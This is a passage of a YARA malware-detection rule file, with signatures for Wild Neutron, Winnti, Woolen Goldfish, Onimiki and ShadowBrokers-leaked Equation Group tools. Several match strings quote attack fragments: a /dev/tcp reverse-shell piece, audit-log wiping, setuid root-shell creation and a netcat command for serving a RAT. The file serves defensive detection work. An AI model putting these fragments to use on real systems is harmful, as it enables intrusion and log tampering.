    uint16(0) == 23117 and filesize < 1024000 and all of them
}

rule WildNeutron_Sample_6 {
  meta:
    description = "Wild Neutron APT Sample Rule - file 4bd548fe07b19178281edb1ee81c9711525dab03dc0b6676963019c44cc75865"
    author = "Florian Roth"
    reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
    date = "2015-07-10"
    score = 60
    hash = "4bd548fe07b19178281edb1ee81c9711525dab03dc0b6676963019c44cc75865"
  strings:
    $s0 = "mshtaex.exe" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 317440 and all of them
}

rule WildNeutron_Sample_7 {
  meta:
    description = "Wild Neutron APT Sample Rule - file a14d31eb965ea8a37ebcc3b5635099f2ca08365646437c770212d534d504ff3c"
    author = "Florian Roth"
    reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
    date = "2015-07-10"
    score = 60
    hash = "a14d31eb965ea8a37ebcc3b5635099f2ca08365646437c770212d534d504ff3c"
  strings:
    $s0 = "checking match for '%s' user %s host %s addr %s" ascii fullword
    $s1 = "PEM_read_bio_PrivateKey failed" ascii fullword
    $s2 = "usage: %s [-ehR] [-f log_facility] [-l log_level] [-u umask]" ascii fullword
    $s3 = "%s %s for %s%.100s from %.200s port %d%s" ascii fullword
    $s4 = "clapi32.dll" ascii fullword
    $s5 = "Connection from %s port %d" ascii fullword
    $s6 = "/usr/etc/ssh_known_hosts" ascii fullword
    $s7 = "Version: %s - %s %s %s %s" ascii fullword
    $s8 = "[-] connect()" ascii fullword
    $s9 = "/bin/sh /usr/etc/sshrc" ascii fullword
    $s10 = "kexecdhs.c" ascii fullword
    $s11 = "%s: setrlimit(RLIMIT_FSIZE, { 0, 0 }): %s" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 5120000 and all of them
}

rule WildNeutron_Sample_8 {
  meta:
    description = "Wild Neutron APT Sample Rule - file 758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92"
    author = "Florian Roth"
    reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
    date = "2015-07-10"
    score = 60
    hash = "758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92"
  strings:
    $x1 = "RunFile: couldn't load SHELL32.DLL!" ascii fullword
    $x2 = "RunFile: couldn't find ShellExecuteExA/W in SHELL32.DLL!" ascii fullword
    $x3 = "Error executing CreateProcess()!!" wide fullword
    $x4 = "cmdcmdline" wide fullword
    $x5 = "Invalid input handle!!!" ascii fullword
    $s1 = "Process %d terminated" wide fullword
    $s2 = "Process is not running any more" wide fullword
    $s3 = "javacpl.exe" wide fullword
    $s4 = "Windows NT Version %lu.%lu" wide fullword
    $s5 = "Usage: destination [reference]" wide fullword
    $s6 = ".com;.exe;.bat;.cmd" wide fullword
    $s7 = ") -%s-> %s (" ascii fullword
    $s8 = "cmdextversion" wide fullword
    $s9 = "Invalid pid (%s)" wide fullword
    $s10 = "\"%s\" /K %s" wide fullword
    $s11 = "Error setting %s (%s)" wide fullword
    $s12 = "DEBUG: Cannot allocate memory for ptrNextNode->ptrNext!" ascii fullword
    $s13 = "Failed to build full directory path" wide fullword
    $s14 = "DEBUG: Cannot allocate memory for ptrFileArray!" ascii fullword
    $s15 = "%-8s %-3s  %*s %s  %s" wide fullword
    $s16 = " %%%c in (%s) do " wide fullword
  condition:
    uint16(0) == 23117 and filesize < 1717248 and 2 of ($x*) and 6 of ($s*)
}

rule WildNeutron_Sample_9 {
  meta:
    description = "Wild Neutron APT Sample Rule - file 781eb1e17349009fbae46aea5c59d8e5b68ae0b42335cb035742f6b0f4e4087e"
    author = "Florian Roth"
    reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
    date = "2015-07-10"
    score = 60
    hash = "781eb1e17349009fbae46aea5c59d8e5b68ae0b42335cb035742f6b0f4e4087e"
  strings:
    $s0 = "http://get.adobe.com/flashplayer/" wide fullword
    $s1 = "xxxxxxxxxxxxxxxxxxxx" wide fullword
    $s4 = " Player Installer/Uninstaller" wide fullword
    $s5 = "Adobe Flash Plugin Updater" wide fullword
    $s6 = "uSOFTWARE\\Adobe" wide fullword
    $s11 = "2008R2" wide fullword
    $s12 = "%02d.%04d.%s" wide fullword
    $s13 = "%d -> %d" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 512000 and all of them
}

rule WildNeutron_Sample_10 {
  meta:
    description = "Wild Neutron APT Sample Rule - file 1d3bdabb350ba5a821849893dabe5d6056bf7ba1ed6042d93174ceeaa5d6dad7"
    author = "Florian Roth"
    reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
    date = "2015-07-10"
    score = 60
    hash = "1d3bdabb350ba5a821849893dabe5d6056bf7ba1ed6042d93174ceeaa5d6dad7"
  strings:
    $n1 = "/c for /L %%i in (1,1,2) DO ping 127.0.0.1 -n 3 & type %%windir%%\\notepad.exe > %s & del /f %s" ascii fullword
    $s1 = "%SYSTEMROOT%\\temp\\_dbg.tmp" ascii fullword
    $s2 = "%SYSTEMROOT%\\SysWOW64\\mspool.dll" ascii fullword
    $s3 = "%SYSTEMROOT%\\System32\\dpcore16t.dll" ascii fullword
    $s4 = "%SYSTEMROOT%\\System32\\wdigestEx.dll" ascii fullword
    $s5 = "%SYSTEMROOT%\\System32\\mspool.dll" ascii fullword
    $s6 = "%SYSTEMROOT%\\System32\\kernel32.dll" ascii fullword
    $s7 = "%SYSTEMROOT%\\SysWOW64\\iastor32.exe" ascii fullword
    $s8 = "%SYSTEMROOT%\\System32\\msvcse.exe" ascii fullword
    $s9 = "%SYSTEMROOT%\\System32\\mshtaex.exe" ascii fullword
    $s10 = "%SYSTEMROOT%\\System32\\iastor32.exe" ascii fullword
    $s11 = "%SYSTEMROOT%\\SysWOW64\\mshtaex.exe" ascii fullword
    $x1 = "wdigestEx.dll" ascii fullword
    $x2 = "dpcore16t.dll" ascii fullword
    $x3 = "mspool.dll" ascii fullword
    $x4 = "msvcse.exe" ascii fullword
    $x5 = "mshtaex.exe" wide fullword
    $x6 = "iastor32.exe" ascii fullword
    $y1 = "Installer.exe" ascii fullword
    $y2 = "Info: Process %s" ascii fullword
    $y3 = "Error: GetFileTime %s 0x%x" ascii fullword
    $y4 = "Install succeeded" ascii fullword
    $y5 = "Error: RegSetValueExA 0x%x" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 409600 and ($n1 or (1 of ($s*) and 1 of ($x*) and 3 of ($y*)))
}

rule WildNeutron_javacpl {
  meta:
    description = "Wild Neutron APT Sample Rule - from files 683f5b476f8ffe87ec22b8bab57f74da4a13ecc3a5c2cbf951999953c2064fc9, 758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92, 8ca7ed720babb32a6f381769ea00e16082a563704f8b672cb21cf11843f4da7a"
    author = "Florian Roth"
    reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
    date = "2015-07-10"
    score = 60
    super_rule = 1
    hash1 = "683f5b476f8ffe87ec22b8bab57f74da4a13ecc3a5c2cbf951999953c2064fc9"
    hash2 = "758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92"
    hash3 = "8ca7ed720babb32a6f381769ea00e16082a563704f8b672cb21cf11843f4da7a"
  strings:
    $x1 = "javacpl.exe" wide fullword
    $s0 = "RunFile: couldn't find ShellExecuteExA/W in SHELL32.DLL!" ascii fullword
    $s1 = "Error executing CreateProcess()!!" wide fullword
    $s2 = "http://www.java.com/en/download/installed.jsp?detect=jre" ascii fullword
    $s3 = "RunFile: couldn't load SHELL32.DLL!" ascii fullword
    $s4 = "Process is not running any more" wide fullword
    $s6 = "Windows NT Version %lu.%lu" wide fullword
    $s7 = "Usage: destination [reference]" wide fullword
    $s8 = "Invalid input handle!!!" ascii fullword
    $s9 = ".com;.exe;.bat;.cmd" wide fullword
    $s10 = ") -%s-> %s (" ascii fullword
    $s11 = "cmdextversion" wide fullword
    $s12 = "Invalid pid (%s)" wide fullword
    $s13 = "\"%s\" /K %s" wide fullword
    $s14 = "Error setting %s (%s)" wide fullword
    $s16 = "cmdcmdline" wide fullword
    $s39 = "2008R2" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 1717248 and all of them
}

rule onimiki {
  meta:
    description = "Linux/Onimiki malicious DNS server"
    malware = "Linux/Onimiki"
    operation = "Windigo"
    author = "Olivier Bilodeau <bilodeau@eset.com>"
    created = "2014-02-06"
    reference = "http://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf"
    contact = "windigo@eset.sk"
    source = "https://github.com/eset/malware-ioc/"
    license = "BSD 2-Clause"
  strings:
    $a1 = { 43 0F B6 74 2A 0E 43 0F B6 0C 2A 8D 7C 3D 00 8D }
    $a2 = { 74 35 00 8D 4C 0D 00 89 F8 41 F7 E3 89 F8 29 D0 }
    $a3 = { D1 E8 01 C2 89 F0 C1 EA 04 44 8D 0C 92 46 8D 0C }
    $a4 = { 8A 41 F7 E3 89 F0 44 29 CF 29 D0 D1 E8 01 C2 89 }
    $a5 = { C8 C1 EA 04 44 8D 04 92 46 8D 04 82 41 F7 E3 89 }
    $a6 = { C8 44 29 C6 29 D0 D1 E8 01 C2 C1 EA 04 8D 04 92 }
    $a7 = { 8D 04 82 29 C1 42 0F B6 04 21 42 88 84 14 C0 01 }
    $a8 = { 00 00 42 0F B6 04 27 43 88 04 32 42 0F B6 04 26 }
    $a9 = { 42 88 84 14 A0 01 00 00 49 83 C2 01 49 83 FA 07 }
  condition:
    all of them
}

rule Winnti_signing_cert {
  meta:
    description = "Detects a signing certificate used by the Winnti APT group"
    author = "Florian Roth"
    reference = "https://securelist.com/analysis/publications/72275/i-am-hdroot-part-1/"
    date = "2015-10-10"
    score = 75
    hash1 = "a9a8dc4ae77b1282f0c8bdebd2643458fc1ceb3145db4e30120dd81676ff9b61"
    hash2 = "9001572983d5b1f99787291edaadbb65eb2701722f52470e89db2c59def24672"
  strings:
    $s1 = "Guangzhou YuanLuo Technology Co." ascii
    $s2 = "Guangzhou YuanLuo Technology Co.,Ltd" ascii
    $s3 = "$Asahi Kasei Microdevices Corporation0" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 716800 and 1 of them
}

rule Winnti_malware_Nsiproxy {
  meta:
    description = "Detects a Winnti rootkit"
    author = "Florian Roth"
    date = "2015-10-10"
    score = 75
    hash1 = "9001572983d5b1f99787291edaadbb65eb2701722f52470e89db2c59def24672"
    hash2 = "cf1e006694b33f27d7c748bab35d0b0031a22d193622d47409b6725b395bffb0"
    hash3 = "326e2cabddb641777d489a9e7a39d52c0dc2dcb1fde1762554ea162792056b6e"
    hash4 = "aff7c7478fe33c57954b6fec2095efe8f9edf5cdb48a680de9439ba62a77945f"
    hash5 = "ba7ccd027fd2c826bbe8f2145d5131eff906150bd98fe25a10fbee2c984df1b8"
  strings:
    $x1 = "\\Driver\\nsiproxy" wide fullword
    $a1 = "\\Device\\StreamPortal" wide fullword
    $a2 = "\\Device\\PNTFILTER" wide fullword
    $s1 = "Cookie: SN=" ascii fullword
    $s2 = "\\BaseNamedObjects\\_transmition_synchronization_" wide fullword
    $s3 = "Winqual.sys" wide fullword
    $s4 = "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}" wide fullword
    $s5 = "http://www.wasabii.com.tw 0" ascii fullword
  condition:
    uint16(0) == 23117 and $x1 and 1 of ($a*) and 2 of ($s*)
}

rule Winnti_malware_UpdateDLL {
  meta:
    description = "Detects a Winnti malware - Update.dll"
    author = "Florian Roth"
    reference = "VTI research"
    date = "2015-10-10"
    score = 75
    hash1 = "1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016"
    hash2 = "50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a"
    hash3 = "6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58"
    hash4 = "50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a"
  strings:
    $c1 = "'Wymajtec$Tima Stempijg Sarviges GA -$G2" ascii fullword
    $c2 = "AHDNEAFE1.sys" ascii fullword
    $c3 = "SOTEFEHJ3.sys" ascii fullword
    $c4 = "MainSYS64.sys" ascii fullword
    $s1 = "\\Registry\\User\\%s\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" wide fullword
    $s2 = "Update.dll" ascii fullword
    $s3 = "\\\\.\\pipe\\usbpcex%d" wide fullword
    $s4 = "\\\\.\\pipe\\usbpcg%d" wide fullword
    $s5 = "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WMI" wide fullword
    $s6 = "\\??\\pipe\\usbpcg%d" wide fullword
    $s7 = "\\??\\pipe\\usbpcex%d" wide fullword
    $s8 = "HOST: %s" ascii fullword
    $s9 = "$$$--Hello" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 1024000 and ((1 of ($c*) and 3 of ($s*)) or all of ($s*))
}

rule Winnti_malware_FWPK {
  meta:
    description = "Detects a Winnti malware - FWPKCLNT.SYS"
    author = "Florian Roth"
    reference = "VTI research"
    date = "2015-10-10"
    score = 75
    hash1 = "1098518786c84b0d31f215122275582bdcd1666653ebc25d50a142b4f5dabf2c"
    hash2 = "9a684ffad0e1c6a22db1bef2399f839d8eff53d7024fb014b9a5f714d11febd7"
    hash3 = "a836397817071c35e24e94b2be3c2fa4ffa2eb1675d3db3b4456122ff4a71368"
  strings:
    $s0 = "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}\\" wide fullword
    $s1 = "%x:%d->%x:%d, Flag %s%s%s%s%s, seq %u, ackseq %u, datalen %u" ascii fullword
    $s2 = "FWPKCLNT.SYS" ascii fullword
    $s3 = "Port Layer" wide fullword
    $s4 = "%x->%x, icmp type %d, code %d" ascii fullword
    $s5 = "\\BaseNamedObjects\\{93144EB0-8E3E-4591-B307-8EEBFE7DB28E}" wide fullword
    $s6 = "\\Ndi\\Interfaces" wide fullword
    $s7 = "\\Device\\{93144EB0-8E3E-4591-B307-8EEBFE7DB28F}" wide fullword
    $s8 = "Bad packet" ascii fullword
    $s9 = "\\BaseNamedObjects\\EKV0000000000" wide fullword
    $s10 = "%x->%x" ascii fullword
    $s11 = "IPInjectPkt" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 657408 and all of them
}

rule Winnti_malware_StreamPortal_Gen {
  meta:
    description = "Detects a Winnti malware - Streamportal"
    author = "Florian Roth"
    reference = "VTI research"
    date = "2015-10-10"
    score = 75
    hash1 = "326e2cabddb641777d489a9e7a39d52c0dc2dcb1fde1762554ea162792056b6e"
    hash2 = "9001572983d5b1f99787291edaadbb65eb2701722f52470e89db2c59def24672"
    hash3 = "aff7c7478fe33c57954b6fec2095efe8f9edf5cdb48a680de9439ba62a77945f"
  strings:
    $s0 = "Proxies destination address/port for TCP" wide fullword
    $s3 = "\\Device\\StreamPortal" wide fullword
    $s4 = "Transport-Data Proxy Sub-Layer" wide fullword
    $s5 = "Cookie: SN=" ascii fullword
    $s6 = "\\BaseNamedObjects\\_transmition_synchronization_" wide fullword
    $s17 = "NTOSKRNL.EXE" wide fullword
    $s19 = "FwpsReferenceNetBufferList0" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 281600 and all of them
}

rule WinntiPharma {
  meta:
    author = "Jose Ramon Palanco"
    copyright = "Drainware, Inc."
    date = "2015-06-23"
    description = "Backdoor Win64 Winnti Pharma"
    ref = "https://securelist.com/blog/research/70991/games-are-over/"
  strings:
    $s0 = "Cookie: SN="
    $s1 = "{3ec05b4a-ea88-1378-3389-66706ba27600}"
    $s2 = "{4D36E972-E325-11CE-BFC1-08002BE10318}"
    $s3 = "master secret"
    $s4 = "MyEngineNetEvent"
  condition:
    all of ($s*)
}

rule WoolenGoldfish_Sample_1 {
  meta:
    description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
    author = "Florian Roth"
    reference = "http://goo.gl/NpJpVZ"
    date = "2015/03/25"
    score = 60
    hash = "7ad0eb113bc575363a058f4bf21dbab8c8f7073a"
  strings:
    $s1 = "Cannot execute (%d)" ascii fullword
    $s16 = "SvcName" ascii fullword
  condition:
    all of them
}

rule WoolenGoldfish_Generic_1 {
  meta:
    description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
    author = "Florian Roth"
    reference = "http://goo.gl/NpJpVZ"
    date = "2015/03/25"
    score = 90
    super_rule = 1
    hash0 = "5d334e0cb4ff58859e91f9e7f1c451ffdc7544c3"
    hash1 = "d5b2b30fe2d4759c199e3659d561a50f88a7fb2e"
    hash2 = "a42f1ad2360833baedd2d5f59354c4fc3820c475"
  strings:
    $x0 = "Users\\Wool3n.H4t\\"
    $x1 = "C-CPP\\CWoolger"
    $x2 = "NTSuser.exe" wide fullword
    $s1 = "107.6.181.116" wide fullword
    $s2 = "oShellLink.Hotkey = \"CTRL+SHIFT+F\"" fullword
    $s3 = "set WshShell = WScript.CreateObject(\"WScript.Shell\")" fullword
    $s4 = "oShellLink.IconLocation = \"notepad.exe, 0\"" fullword
    $s5 = "set oShellLink = WshShell.CreateShortcut(strSTUP & \"\\WinDefender.lnk\")" fullword
    $s6 = "wlg.dat" fullword
    $s7 = "woolger" wide fullword
    $s8 = "[Enter]" fullword
    $s9 = "[Control]" fullword
  condition:
    (1 of ($x*) and 2 of ($s*)) or (6 of ($s*))
}

rule WoolenGoldfish_Generic_2 {
  meta:
    description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
    author = "Florian Roth"
    reference = "http://goo.gl/NpJpVZ"
    date = "2015/03/25"
    score = 90
    hash1 = "47b1c9caabe3ae681934a33cd6f3a1b311fd7f9f"
    hash2 = "62172eee1a4591bde2658175dd5b8652d5aead2a"
    hash3 = "7fef48e1303e40110798dfec929ad88f1ad4fbd8"
    hash4 = "c1edf6e3a271cf06030cc46cbd90074488c05564"
  strings:
    $s0 = "modules\\exploits\\littletools\\agent_wrapper\\release" ascii
  condition:
    all of them
}

rule WoolenGoldfish_Generic_3 {
  meta:
    description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
    author = "Florian Roth"
    reference = "http://goo.gl/NpJpVZ"
    date = "2015/03/25"
    score = 90
    hash1 = "86222ef166474e53f1eb6d7e6701713834e6fee7"
    hash2 = "e8dbcde49c7f760165ebb0cb3452e4f1c24981f5"
  strings:
    $x1 = "... get header FATAL ERROR !!!  %d bytes read > header_size" ascii fullword
    $x2 = "index.php?c=%S&r=%x&u=1&t=%S" wide fullword
    $x3 = "connect_back_tcp_channel#do_connect:: Error resolving connect back hostname" ascii fullword
    $s0 = "kernel32.dll GetProcAddressLoadLibraryAws2_32.dll" ascii fullword
    $s1 = "Content-Type: multipart/form-data; boundary=%S" wide fullword
    $s2 = "Attempting to unlock uninitialized lock!" ascii fullword
    $s4 = "unable to load kernel32.dll" ascii fullword
    $s5 = "index.php?c=%S&r=%x" wide fullword
    $s6 = "%s len:%d " ascii fullword
    $s7 = "Encountered error sending syscall response to client" ascii fullword
    $s9 = "/info.dat" ascii fullword
    $s10 = "Error entering thread lock" ascii fullword
    $s11 = "Error exiting thread lock" ascii fullword
    $s12 = "connect_back_tcp_channel_init:: socket() failed" ascii fullword
  condition:
    (1 of ($x*)) or (8 of ($s*))
}

rule EquationGroup_emptycriss {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file emptycriss"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "a698d35a0c4d25fd960bd40c1de1022bb0763b77938bf279e91c9330060b0b91"
  strings:
    $s1 = "./emptycriss <target IP>" ascii fullword
    $s2 = "Cut and paste the following to the telnet prompt:" ascii fullword
    $s8 = "environ define TTYPROMPT abcdef" ascii fullword
  condition:
    (filesize < 51200 and 1 of them)
}

rule EquationGroup_scripme {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file scripme"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "a1adf1c1caad96e7b7fd92cbf419c4cfa13214e66497c9e46ec274a487cd098a"
  strings:
    $x1 = "running \\\"tcpdump -n -n\\\", on the environment variable \\$INTERFACE, scripted" ascii fullword
    $x2 = "Cannot read $opetc/scripme.override -- are you root?" ascii
    $x3 = "$ENV{EXPLOIT_SCRIPME}" ascii
    $x4 = "$opetc/scripme.override" ascii
  condition:
    (filesize < 30720 and 1 of them)
}

rule EquationGroup_cryptTool {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file cryptTool"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "96947ad30a2ab15ca5ef53ba8969b9d9a89c48a403e8b22dd5698145ac6695d2"
  strings:
    $s1 = "The encryption key is " ascii fullword
    $s2 = "___tempFile2.out" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 204800 and all of them)
}

rule EquationGroup_dumppoppy {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file dumppoppy"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "4a5c01590063c78d03c092570b3206fde211daaa885caac2ab0d42051d4fc719"
  strings:
    $x1 = "Unless the -c (clobber) option is used, if two RETR commands of the" ascii fullword
    $x2 = "mywarn(\"End of $destfile determined by \\\"^Connection closed by foreign host\\\"\")" ascii fullword
    $l1 = "End of $destfile determined by \"^Connection closed by foreign host"
  condition:
    (filesize < 20480 and 1 of them)
}

rule EquationGroup_Auditcleaner {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file Auditcleaner"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "8c172a60fa9e50f0df493bf5baeb7cc311baef327431526c47114335e0097626"
  strings:
    $x1 = "> /var/log/audit/audit.log; rm -f ." ascii
    $x2 = "Pastables to run on target:" ascii
    $x3 = "cp /var/log/audit/audit.log .tmp" ascii
    $l1 = "Here is the first good cron session from" ascii fullword
    $l2 = "No need to clean LOGIN lines." ascii fullword
  condition:
    (filesize < 307200 and 1 of them)
}

rule EquationGroup_reverse_shell {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file reverse.shell.script"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "d29aa24e6fb9e3b3d007847e1630635d6c70186a36c4ab95268d28aa12896826"
  strings:
    $s1 = "sh >/dev/tcp/" ascii
    $s2 = " <&1 2>&1" ascii fullword
  condition:
    (filesize < 1024 and all of them)
}

rule EquationGroup_tnmunger {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file tnmunger"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "1ab985d84871c54d36ba4d2abd9168c2a468f1ba06994459db06be13ee3ae0d2"
  strings:
    $s1 = "TEST: mungedport=%6d  pp=%d  unmunged=%6d" ascii fullword
    $s2 = "mungedport=%6d  pp=%d  unmunged=%6d" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 10240 and 1 of them)
}

rule EquationGroup_ys_ratload {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file ys.ratload.sh"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "a340e5b5cfd41076bd4d6ad89d7157eeac264db97a9dddaae15d935937f10d75"
  strings:
    $x1 = "echo \"example: ${0} -l 192.168.1.1 -p 22222 -x 9999\"" ascii fullword
    $x2 = "-x [ port to start mini X server on DEFAULT = 12121 ]\"" ascii fullword
    $x3 = "CALLBACK_PORT=32177" ascii fullword
  condition:
    (uint16(0) == 8483 and filesize < 3072 and 1 of them)
}

rule EquationGroup_eh_1_1_0 {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file eh.1.1.0.0"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "0f8dd094516f1be96da5f9addc0f97bcac8f2a348374bd9631aa912344559628"
  strings:
    $x1 = "usage: %s -e -v -i target IP [-c Cert File] [-k Key File]" ascii fullword
    $x2 = "TYPE=licxfer&ftp=%s&source=/var/home/ftp/pub&version=NA&licfile=" ascii
    $x3 = "[-l Log File] [-m save MAC time file(s)] [-p Server Port]" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 102400 and 1 of them)
}

rule EquationGroup_evolvingstrategy_1_0_1 {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file evolvingstrategy.1.0.1.1"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "fe70e16715992cc86bbef3e71240f55c7d73815b4247d7e866c845b970233c1b"
  strings:
    $s1 = "chown root sh; chmod 4777 sh;" ascii fullword
    $s2 = "cp /bin/sh .;chown root sh;" ascii fullword
    $l1 = "echo clean up when elevated:" ascii fullword
    $x1 = "EXE=$DIR/sbin/ey_vrupdate" ascii fullword
  condition:
    (filesize < 4096 and 1 of them)
}

rule EquationGroup_toast_v3_2_0 {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file toast_v3.2.0.1-linux"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "2ce2d16d24069dc29cf1464819a9dc6deed38d1e5ffc86d175b06ddb691b648b"
  strings:
    $x2 = "Del --- Usage: %s -l file -w wtmp -r user" ascii fullword
    $s5 = "Roasting ->%s<- at ->%d:%d<-" ascii fullword
    $s6 = "rbnoil -Roasting ->" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 51200 and 1 of them)
}

rule EquationGroup_sshobo {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file sshobo"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "c7491898a0a77981c44847eb00fb0b186aa79a219a35ebbca944d627eefa7d45"
  strings:
    $x1 = "Requested forwarding of port %d but user is not root." ascii fullword
    $x2 = "internal error: we do not read, but chan_read_failed for istate" ascii fullword
    $x3 = "~#  - list forwarded connections" ascii fullword
    $x4 = "packet_inject_ignore: block" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 614400 and all of them)
}

rule EquationGroup_magicjack_v1_1_0_0_client_1_1_0_0 {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file magicjack_v1.1.0.0_client-1.1.0.0.py"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "63292a2353275a3bae012717bb500d5169cd024064a1ce8355ecb4e9bfcdfdd1"
  strings:
    $x1 = "result = self.send_command(\"ls -al %s\" % self.options.DIR)" ascii fullword
    $x2 = "cmd += \"D=-l%s \" % self.options.LISTEN_PORT" ascii fullword
  condition:
    (uint16(0) == 8483 and filesize < 81920 and 1 of them)
}

rule EquationGroup_packrat {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file packrat"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "d3e067879c51947d715fc2cf0d8d91c897fe9f50cae6784739b5c17e8a8559cf"
  strings:
    $x2 = "Use this on target to get your RAT:" ascii fullword
    $x3 = "$ratremotename && " ascii fullword
    $x5 = "$command = \"$nc$bindto -vv -l -p $port < ${ratremotename}\" ;" ascii fullword
  condition:
    (filesize < 71680 and 1 of them)
}

rule EquationGroup_telex {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file telex"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "e9713b15fc164e0f64783e7a2eac189a40e0a60e2268bd7132cfdc624dfe54ef"
  strings:
    $x1 = "usage: %s -l [ netcat listener ] [ -p optional target port instead of 23 ] <ip>" ascii fullword
    $x2 = "target is not vulnerable. exiting" ascii fullword
    $s3 = "Sending final buffer: evil_blocks and shellcode..." ascii fullword
    $s4 = "Timeout waiting for daemon to die.  Exploit probably failed." ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 51200 and 1 of them)
}

rule EquationGroup_calserver {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file calserver"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "048625e9a0ca46d7fe221e262c8dd05e7a5339990ffae2fb65a9b0d705ad6099"
  strings:
    $x1 = "usage: %s <host> <port> e <contents of a local file to be executed on target>" ascii fullword
    $x2 = "Writing your %s to target." ascii fullword
    $x3 = "(e)xploit, (r)ead, (m)ove and then write, (w)rite" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 30720 and 1 of them)
}

rule EquationGroup_porkclient {
  meta:
